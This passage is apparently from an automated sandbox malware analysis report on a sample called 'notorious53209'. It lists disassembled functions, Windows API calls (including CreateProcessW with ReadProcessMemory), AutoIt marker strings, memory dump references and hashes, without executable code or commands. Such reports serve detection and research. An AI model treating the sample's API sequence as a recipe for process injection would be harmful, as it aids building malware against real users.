                                            • Instruction Fuzzy Hash: FF41E8346206069BDF28EE69C8919AFF7A5EF8036AB14813DEC55C7640D7709DE88B4C
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: AU3!P/,$EA06
                                            • API String ID: 4104443479-707197413
                                            • Opcode ID: 943ac5cdc7e133950589c867b0245f1c7fe8de93d27ffbc0833e1542dd1e888e
                                            • Instruction ID: fdb96970cb8ad38f839e2d45f47cfa2725d031526e10c8dcc67c9795f23068ef
                                            • Opcode Fuzzy Hash: 943ac5cdc7e133950589c867b0245f1c7fe8de93d27ffbc0833e1542dd1e888e
                                            • Instruction Fuzzy Hash: 6F415DE1A341685BDF11BF64C8517BE7FA5AB05300F5840F5EC869B282C561ADA48BE1
                                            APIs
                                            • _memset.LIBCMT ref: 0026EE62
                                            • 75B0A2D5.COMDLG32(?), ref: 0026EEAC
                                              • Part of subcall function 002348AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002348A1,?,?,002337C0,?), ref: 002348CE
                                              • Part of subcall function 002509D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002509F4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: NamePath$FullLong_memset
                                            • String ID: X
                                            • API String ID: 3051022977-3081909835
                                            • Opcode ID: 1e26581c6674a2afab48cc533d9697c63357b97c931305c02ce8b1927d1081a6
                                            • Instruction ID: 6ffa09b08c8e3b8b8fb90ec838e669ef9b2bb2b6a7907c80f0bea145ba223c08
                                            • Opcode Fuzzy Hash: 1e26581c6674a2afab48cc533d9697c63357b97c931305c02ce8b1927d1081a6
                                            • Instruction Fuzzy Hash: AD21C3B1A202989BCF11DF94CC45BEE7BF89F49314F04405AE808E7281DBF459A98FA1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __fread_nolock_memmove
                                            • String ID: EA06
                                            • API String ID: 1988441806-3962188686
                                            • Opcode ID: 2bfe284a15f85007d90672f9bd9b29ed91174e7b42d7cd5d8df1db36ddb0be8f
                                            • Instruction ID: 3e32d433e439213c0c2a4019a3aa1a4fbfe075bb8b0d6a59e117d47d6b84f905
                                            • Opcode Fuzzy Hash: 2bfe284a15f85007d90672f9bd9b29ed91174e7b42d7cd5d8df1db36ddb0be8f
                                            • Instruction Fuzzy Hash: 7701F9718142587EDB28CAA8C81AFFE7BF89B01311F00419EF552D6181E5B5A6288B60
                                            APIs
                                              • Part of subcall function 0025594C: __FF_MSGBANNER.LIBCMT ref: 00255963
                                              • Part of subcall function 0025594C: __NMSG_WRITE.LIBCMT ref: 0025596A
                                              • Part of subcall function 0025594C: RtlAllocateHeap.NTDLL(00B70000,00000000,00000001), ref: 0025598F
                                            • std::exception::exception.LIBCMT ref: 0025102C
                                            • __CxxThrowException@8.LIBCMT ref: 00251041
                                              • Part of subcall function 002587DB: RaiseException.KERNEL32(?,?,00000000,002EBAF8,?,00000001,?,?,?,00251046,00000000,002EBAF8,00239FEC,00000001), ref: 00258830
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                            • String ID: bad allocation
                                            • API String ID: 3902256705-2104205924
                                            • Opcode ID: b60b12a0e0000275dc16b9c0c16cb93d359827a7f08a5d57ed556f734c279c83
                                            • Instruction ID: 1baf7db35d9df7a8c1d288af89f0348db512c71a12c14fd2a2f78a3f9762b2c5
                                            • Opcode Fuzzy Hash: b60b12a0e0000275dc16b9c0c16cb93d359827a7f08a5d57ed556f734c279c83
                                            • Instruction Fuzzy Hash: 34F0F935520219A6CB21BE54DC05ADF77AC9F00352F100425FC04A5581EFB18ABCC6D8
                                            APIs
                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00299B82
                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00299B99
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Temp$FileNamePath
                                            • String ID: aut
                                            • API String ID: 3285503233-3010740371
                                            • Opcode ID: 74224ecf4708e5557c2971050e0f71dd1ce70e56e1f78ababea25536a4eb7854
                                            • Instruction ID: 8b539a17975aa9920703b0a94d53c2f9e748813e3c557319bed653e15d197eb1
                                            • Opcode Fuzzy Hash: 74224ecf4708e5557c2971050e0f71dd1ce70e56e1f78ababea25536a4eb7854
                                            • Instruction Fuzzy Hash: 56D05E7958030DABDB609B94EC0EF9A772CEB04700F0042A1BF54911A2DEB065A88B91
                                            APIs
                                            • CreateProcessW.KERNEL32(?,00000000), ref: 00161ACD
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00161B13
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395533851.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_160000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Process$CreateMemoryRead
                                            • String ID:
                                            • API String ID: 2726527582-0
                                            • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                            • Instruction ID: 4ee016f59682c73bf0379f2a719783ad87c8b065bbd803a0ad4629883cbcce57
                                            • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                            • Instruction Fuzzy Hash: 10620930A14658DBEB24CFA4CC50BDEB372EF58300F1491A9D50DEB2A0E7769E91CB59
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30203c71eadfae350f204af4728fce70361e5efb814771fde5ffe83f0dedb1c5
                                            • Instruction ID: cfa946417d40ff4114a0d5cf2130f78c25ca1fb8174c2ce0fb9e377c5d33cc5e
                                            • Opcode Fuzzy Hash: 30203c71eadfae350f204af4728fce70361e5efb814771fde5ffe83f0dedb1c5
                                            • Instruction Fuzzy Hash: 7FF15C705183019FCB14DF28C484A6ABBE5FF89314F14892EF89A9B352DB71E955CF82
                                            APIs
                                            • _memset.LIBCMT ref: 00234401
                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 002344A6
                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 002344C3
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: IconNotifyShell_$_memset
                                            • String ID:
                                            • API String ID: 1505330794-0
                                            • Opcode ID: 9c41d1b49ccf53a0035ebfda6df4ea5f09322474ddba43c15fde8f3350aa604d
                                            • Instruction ID: 04ccefee51aaf08cbc7e156ed1ae6739929e5de343825875759252dbba2bf3e4
                                            • Opcode Fuzzy Hash: 9c41d1b49ccf53a0035ebfda6df4ea5f09322474ddba43c15fde8f3350aa604d
                                            • Instruction Fuzzy Hash: A23152B05147019FD721EF24E8886A7BBF8FB48354F00097EEA9A83251D775A954CB52
                                            APIs
                                            • __FF_MSGBANNER.LIBCMT ref: 00255963
                                              • Part of subcall function 0025A3AB: __NMSG_WRITE.LIBCMT ref: 0025A3D2
                                              • Part of subcall function 0025A3AB: __NMSG_WRITE.LIBCMT ref: 0025A3DC
                                            • __NMSG_WRITE.LIBCMT ref: 0025596A
                                              • Part of subcall function 0025A408: GetModuleFileNameW.KERNEL32(00000000,002F43BA,00000104,00000000,00000001,00000000), ref: 0025A49A
                                              • Part of subcall function 0025A408: ___crtMessageBoxW.LIBCMT ref: 0025A548
                                              • Part of subcall function 002532DF: ___crtCorExitProcess.LIBCMT ref: 002532E5
                                              • Part of subcall function 002532DF: ExitProcess.KERNEL32 ref: 002532EE
                                              • Part of subcall function 00258D68: __getptd_noexit.LIBCMT ref: 00258D68
                                            • RtlAllocateHeap.NTDLL(00B70000,00000000,00000001), ref: 0025598F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                            • String ID:
                                            • API String ID: 1372826849-0
                                            • Opcode ID: 454e50ed8f36f5785ee744179548a05b7b6a62b45545df238b83054353058287
                                            • Instruction ID: 791647771068444ed23d50b902fa5451aff0d420f6afc1611180b6d5f65f2c29
                                            • Opcode Fuzzy Hash: 454e50ed8f36f5785ee744179548a05b7b6a62b45545df238b83054353058287
                                            • Instruction Fuzzy Hash: 62012631231A22DED6107B39EC6262E33988F41773F100136FC01AA181DEB89C298AAC
                                            APIs
                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00299B45
                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,002997D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00299B5B
                                            • CloseHandle.KERNEL32(00000000), ref: 00299B62
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleTime
                                            • String ID:
                                            • API String ID: 3397143404-0
                                            • Opcode ID: 3e8c52e807a479c02387466c2c5199755cbb396656c4316fd989e4617e3fead5
                                            • Instruction ID: 68c85971d41f9a4a85c24e44d7e39fa9cd2d04f1e3131b476b51f697801cf2c7
                                            • Opcode Fuzzy Hash: 3e8c52e807a479c02387466c2c5199755cbb396656c4316fd989e4617e3fead5
                                            • Instruction Fuzzy Hash: A7E08632180214B7EB211F58FC0DFCA7B58AB05775F144220FB14790E087B125219798
                                            APIs
                                            • _free.LIBCMT ref: 00298FA5
                                              • Part of subcall function 00252F95: HeapFree.KERNEL32(00000000,00000000), ref: 00252FA9
                                              • Part of subcall function 00252F95: GetLastError.KERNEL32(00000000,?,00259C64), ref: 00252FBB
                                            • _free.LIBCMT ref: 00298FB6
                                            • _free.LIBCMT ref: 00298FC8
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                            • Instruction ID: 73ce40c2d48fed63e78f051648c763e7c9cdf570881db60374399e96addcebda
                                            • Opcode Fuzzy Hash: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                            • Instruction Fuzzy Hash: 9DE0C2A12287028ACE20A938BD00A8317EE0F4A311B0C080DB809EB982DE34E8688428
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CALL
                                            • API String ID: 0-4196123274
                                            • Opcode ID: a20147099094685f8c90798fbc55b50ad754792fa83b50e281629fed10f22527
                                            • Instruction ID: 60c9736172d191fa785aad024fe94f14d129ff778250916a0bb8cbd1fb214b4e
                                            • Opcode Fuzzy Hash: a20147099094685f8c90798fbc55b50ad754792fa83b50e281629fed10f22527
                                            • Instruction Fuzzy Hash: 7F2249B0528351CFCB29DF14C495B2AB7E1BF45304F14896DE98A8B262D771ECA5CF82
                                            APIs
                                            • 73666F36.UXTHEME ref: 00234992
                                              • Part of subcall function 002535AC: __lock.LIBCMT ref: 002535B2
                                              • Part of subcall function 002535AC: RtlDecodePointer.NTDLL(00000001), ref: 002535BE
                                              • Part of subcall function 002535AC: RtlEncodePointer.NTDLL(?), ref: 002535C9
                                              • Part of subcall function 00234A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00234A73
                                              • Part of subcall function 00234A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00234A88
                                              • Part of subcall function 00233B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00233B7A
                                              • Part of subcall function 00233B4C: IsDebuggerPresent.KERNEL32 ref: 00233B8C
                                              • Part of subcall function 00233B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,002F62F8,002F62E0,?,?), ref: 00233BFD
                                              • Part of subcall function 00233B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00233C81
                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002349D2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$73666DebuggerDecodeEncodeFullNamePathPresent__lock
                                            • String ID:
                                            • API String ID: 1649018686-0
                                            • Opcode ID: ba51aac36190b1b10c1aa9f4573d69d9599ae9fb831e933b8fa8f244fb5a0e8b
                                            • Instruction ID: 97fea1189aa1b85d75bb2072593fb8da0ffb2ffc8c7431a4046a0bdc5df9a5f5
                                            • Opcode Fuzzy Hash: ba51aac36190b1b10c1aa9f4573d69d9599ae9fb831e933b8fa8f244fb5a0e8b
                                            • Instruction Fuzzy Hash: 791190B19243159BC300EF28EC0991AFFF8EB95760F10462EF485872B1DBB09564CF95
                                            APIs
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00235E27
                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 0026E19C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 8bed589d16010ea8e2afdc84258c17bd0d9dc3438cba867d17aa172f22684cc2
                                            • Instruction ID: d21b5f648510f082c6c8a998c320b2a2fe6ed999237a52249d5a6cb4dad022bb
                                            • Opcode Fuzzy Hash: 8bed589d16010ea8e2afdc84258c17bd0d9dc3438cba867d17aa172f22684cc2
                                            • Instruction Fuzzy Hash: 5601F9B0250319BEF7240E18CC8AF62379CEB01768F108314BAED6A1D0C6B05D559F10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __lock_file_memset
                                            • String ID:
                                            • API String ID: 26237723-0
                                            • Opcode ID: f710b64e88e6c74b73e5845849048f0eb96a46d8d71dd73782c93a4739c72ae5
                                            • Instruction ID: 4bc76631412d55558366466ac6cef7ce2ff14c2e4ddf69c8a9bacf6c65455c8b
                                            • Opcode Fuzzy Hash: f710b64e88e6c74b73e5845849048f0eb96a46d8d71dd73782c93a4739c72ae5
                                            • Instruction Fuzzy Hash: DC01D431820619EBCF12AF698C0A99F7B61AF40362F144215BC146B1A1DB718A75DF99
                                            APIs
                                              • Part of subcall function 00258D68: __getptd_noexit.LIBCMT ref: 00258D68
                                            • __lock_file.LIBCMT ref: 0025561B
                                              • Part of subcall function 00256E4E: __lock.LIBCMT ref: 00256E71
                                            • __fclose_nolock.LIBCMT ref: 00255626
                                            Memory Dump Source
